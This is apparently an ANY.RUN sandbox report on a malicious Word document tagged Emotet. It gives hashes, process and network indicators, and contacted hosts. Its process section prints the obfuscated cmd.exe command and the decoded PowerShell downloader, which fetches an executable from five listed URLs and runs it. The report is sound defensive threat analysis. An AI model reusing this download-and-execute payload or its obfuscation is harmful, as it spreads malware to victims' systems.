File name: 15_Januar_2019.doc

Full analysis: https://app.any.run/tasks/ee3ed728-b9b9-4fdd-b1e9-b0eaaab1c86c
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 18, 2019, 09:46:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, emotet-doc, emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 15 18:14:00 2019, Last Saved Time/Date: Tue Jan 15 18:14:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0
MD5: A7D9C91DD296745CC5FDD6987B9FAA8D
SHA1: 595501FD3CAE9601015DC24BD51A3786D64FF58F
SHA256: 98081B4049E02B007390F7F3D833D1BA526812F966828D0972DFB8E1FAEEAF6C
SSDEEP: 3072:VN8GhDS0o9zTGOZD6EbzCdn+0Bkbj1Q3:VHoUOZDlben+0Kbp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Starts CMD.EXE for commands execution
      • WINWORD.EXE (PID: 2932)
    • Unusual execution from Microsoft Office
      • WINWORD.EXE (PID: 2932)
    • Runs app for hidden code execution
      • cmd.exe (PID: 3076)
    • Executes PowerShell scripts
      • cmd.exe (PID: 3392)
  • SUSPICIOUS
    • Starts CMD.EXE for commands execution
      • cmd.exe (PID: 2476)
      • cmd.exe (PID: 3076)
    • Creates files in the user directory
      • powershell.exe (PID: 3900)
  • INFO
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 2932)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 2932)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:01:15 18:14:00
ModifyDate: 2019:01:15 18:14:00
Pages: 1
Words: -
Characters: 3
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 3
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
Total processes: 37
Monitored processes: 6
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Process nodes shown in the graph (the interactive graph is only in the full report): start, winword.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, powershell.exe

Process information (fields: PID, CMD, Path, Indicators, Parent process)
PID: 2932
Parent process: explorer.exe
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\15_Januar_2019.doc"
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 2476
Parent process: WINWORD.EXE
Path: C:\Windows\system32\cmd.exe
CMD: "C:\Windows\system32\cmd.exe" /c %PRoGRAMDATa:~0,1%%PRogRAMData:~9,2% /V:oN /R"SeT pSMR=pow^%PUBLIZ:~5,1^%A^%SESSIONN]2RE:~-#,1^%h^%[ERP:~-3,1^%ll $[XA?tytk)9Zheck`ng]2ccountdp9;$EAgonom`cxzooden[owel?jA)new-object Net.xzebZl`ent;$4ubbeAhb)9http://www.foAmXA-31.Au/x]w0Q_XAJ]eUD`_0@http://cod`enlXAnhnme.vn/wmfuxxu_bf8c_ccJhR@http://www.v`XAje?delbo?que.com/oJmIZL4_SF1qj[c]v@http://www.k`beA-?oft.Au/Heq3ZDGN_tvvO3]2e1q@http://www.yogXA?pXAceme.com/QZPd`[_LN2`P6fHd9.Spl`t(9@97;$Intell`gentZottonZh`p?vv)9SleekZottonSh`Atdj9;$ZomputeA?Book?dl ) 91859;$hXApt`cml)9BeAk?h`Aejc9;$deployww)$env:publ`c+9\9+$ZomputeA?Book?dl+9.exe9;foAeXAch($XAAAXAyXAw `n $4ubbeAhb7QGtAyQG$EAgonom`cxzooden[owel?jA.DownloXAdF`le($XAAAXAyXAw, $deployww7;$depo?`tvm)9RetXAljk9;If ((Get-Item $deployww7.length -ge 800007 QGInvoke-Item $deployww;$[exXA?tw)9Fullyconf`guAXAblenA9;bAeXAk;}}cXAtchQG}}$l`mekA)9ZomputeA?wj9;& SEt 8nN=!pSMR:9='!& sEt ZDpU=!8nN:QG={!& seT qLFn=!ZDpU:R=M!& sET xL=!qLFn:A=r!& seT t0Q=!xL:]=9!& Set 5u=!t0Q:92=A!&& sET CB=!5u:Xr=a!& set QgX=!CB:xz=W!&& seT XNV=!QgX:`=i!& SET 1RDn=!XNV:Z=C!&& SeT jDH=!1RDn:?=s!&& SeT CL=!jDH:4=R!& SET Dh=!CL:)==!& sEt dB=!Dh:[=T!& set X3F=!dB:#=4!& Set Kq=!X3F:7=)!&eCHO %Kq%| cmD.exe "
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3076
Parent process: cmd.exe
Path: C:\Windows\system32\cmd.exe
CMD: CmD /V:oN /R"SeT pSMR=pow^%PUBLIZ:~5,1^%A^%SESSIONN]2RE:~-#,1^%h^%[ERP:~-3,1^%ll $[XA?tytk)9Zheck`ng]2ccountdp9;$EAgonom`cxzooden[owel?jA)new-object Net.xzebZl`ent;$4ubbeAhb)9http://www.foAmXA-31.Au/x]w0Q_XAJ]eUD`_0@http://cod`enlXAnhnme.vn/wmfuxxu_bf8c_ccJhR@http://www.v`XAje?delbo?que.com/oJmIZL4_SF1qj[c]v@http://www.k`beA-?oft.Au/Heq3ZDGN_tvvO3]2e1q@http://www.yogXA?pXAceme.com/QZPd`[_LN2`P6fHd9.Spl`t(9@97;$Intell`gentZottonZh`p?vv)9SleekZottonSh`Atdj9;$ZomputeA?Book?dl ) 91859;$hXApt`cml)9BeAk?h`Aejc9;$deployww)$env:publ`c+9\9+$ZomputeA?Book?dl+9.exe9;foAeXAch($XAAAXAyXAw `n $4ubbeAhb7QGtAyQG$EAgonom`cxzooden[owel?jA.DownloXAdF`le($XAAAXAyXAw, $deployww7;$depo?`tvm)9RetXAljk9;If ((Get-Item $deployww7.length -ge 800007 QGInvoke-Item $deployww;$[exXA?tw)9Fullyconf`guAXAblenA9;bAeXAk;}}cXAtchQG}}$l`mekA)9ZomputeA?wj9;& SEt 8nN=!pSMR:9='!& sEt ZDpU=!8nN:QG={!& seT qLFn=!ZDpU:R=M!& sET xL=!qLFn:A=r!& seT t0Q=!xL:]=9!& Set 5u=!t0Q:92=A!&& sET CB=!5u:Xr=a!& set QgX=!CB:xz=W!&& seT XNV=!QgX:`=i!& SET 1RDn=!XNV:Z=C!&& SeT jDH=!1RDn:?=s!&& SeT CL=!jDH:4=R!& SET Dh=!CL:)==!& sEt dB=!Dh:[=T!& set X3F=!dB:#=4!& Set Kq=!X3F:7=)!&eCHO %Kq%| cmD.exe "
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3288
Parent process: cmd.exe
Path: C:\Windows\system32\cmd.exe
CMD: C:\Windows\system32\cmd.exe /S /D /c" eCHO %Kq%"
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3392
Parent process: cmd.exe
Path: C:\Windows\system32\cmd.exe
CMD: cmD.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3900
Parent process: cmd.exe
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD: powershell $Tastytk='CheckingAccountdp';$ErgonomicWoodenTowelsjr=new-object Net.WebClient;$Rubberhb='http://www.forma-31.ru/x9w0Q_aJ9eUDi_0@http://codienlanhnme.vn/wmfuxxu_bf8c_ccJhM@http://www.viajesdelbosque.com/oJmICLR_SF1qjTc9v@http://www.kiber-soft.ru/Heq3CDGN_tvvO3Ae1q@http://www.yogaspaceme.com/QCPdiT_LN2iP6fHd'.Split('@');$IntelligentCottonChipsvv='SleekCottonShirtdj';$ComputersBooksdl = '185';$hapticml='Berkshirejc';$deployww=$env:public+'\'+$ComputersBooksdl+'.exe';foreach($arrayaw in $Rubberhb){try{$ErgonomicWoodenTowelsjr.DownloadFile($arrayaw, $deployww);$depositvm='Metaljk';If ((Get-Item $deployww).length -ge 80000) {Invoke-Item $deployww;$Texastw='Fullyconfigurablenr';break;}}catch{}}$limekr='Computerswj';
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Total events: 1 421
Read events: 957
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 2
Text files: 0
Unknown types: 5

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR87B4.tmp.cvr | - | - | -
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FDAAC77D.wmf | - | - | -
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B3E00393.wmf | - | - | -
3900 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DESUJ70AHUBEKLJOOG21.temp | - | - | -
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7D7E226C.wmf | wmf | B8995D5F60D0DD28071E47BD2C2D288F | AD8E5B2372EA91B8AC17B8083FAADAF7C07CFDC256F1E431EB9AF7EDC0DFB155
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 70B14D807AC82B9DF21F18C147184D05 | 467EFFBC023347E7659FBAE0D736FB6AC5233686D4FFE34258BAE276F4C55967
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\685CEF5A.wmf | wmf | 5D4B1E7B85591BB4EC13AB590A7DF84E | 978AFC8A44609673E41EA6FA6C2BC6251A8E45D6573F6BA26DB77F967554EB89
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$_Januar_2019.doc | pgc | 17EF68127D2447EFD8BD64D1F10E1D1D | 170198C9B6AD7C4A89EA9CB6A287EA765D4BFDB0F0FA792DE464240DBAE2774F
3900 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19964b.TMP | binary | 901ECDF767744E6BB59CB023757886E3 | 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3900 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 901ECDF767744E6BB59CB023757886E3 | 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
HTTP(S) requests: 5
TCP/UDP connections: 5
DNS requests: 5
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3900 | powershell.exe | GET | 404 | 103.18.6.24:80 | http://codienlanhnme.vn/wmfuxxu_bf8c_ccJhM | VN | xml | 345 b | suspicious
3900 | powershell.exe | GET | 404 | 77.222.63.27:80 | http://www.forma-31.ru/x9w0Q_aJ9eUDi_0 | RU | xml | 345 b | suspicious
3900 | powershell.exe | GET | 404 | 159.89.138.46:80 | http://www.viajesdelbosque.com/oJmICLR_SF1qjTc9v | US | xml | 345 b | unknown
3900 | powershell.exe | GET | 404 | 84.54.204.244:80 | http://www.kiber-soft.ru/Heq3CDGN_tvvO3Ae1q | RU | xml | 345 b | suspicious
3900 | powershell.exe | GET | 404 | 162.215.249.12:80 | http://www.yogaspaceme.com/QCPdiT_LN2iP6fHd | US | xml | 345 b | suspicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3900 | powershell.exe | 77.222.63.27:80 | www.forma-31.ru | SpaceWeb Ltd | RU | suspicious
3900 | powershell.exe | 84.54.204.244:80 | www.kiber-soft.ru | PJSC Rostelecom | RU | suspicious
3900 | powershell.exe | 159.89.138.46:80 | www.viajesdelbosque.com | - | US | unknown
3900 | powershell.exe | 103.18.6.24:80 | codienlanhnme.vn | GMO RUNSYSTEM JSC | VN | suspicious
3900 | powershell.exe | 162.215.249.12:80 | www.yogaspaceme.com | Unified Layer | US | suspicious

DNS requests

Domain | IP | Reputation
www.forma-31.ru | 77.222.63.27 | suspicious
codienlanhnme.vn | 103.18.6.24 | suspicious
www.viajesdelbosque.com | 159.89.138.46 | unknown
www.kiber-soft.ru | 84.54.204.244 | suspicious
www.yogaspaceme.com | 162.215.249.12 | suspicious

Threats

No threats detected
No debug info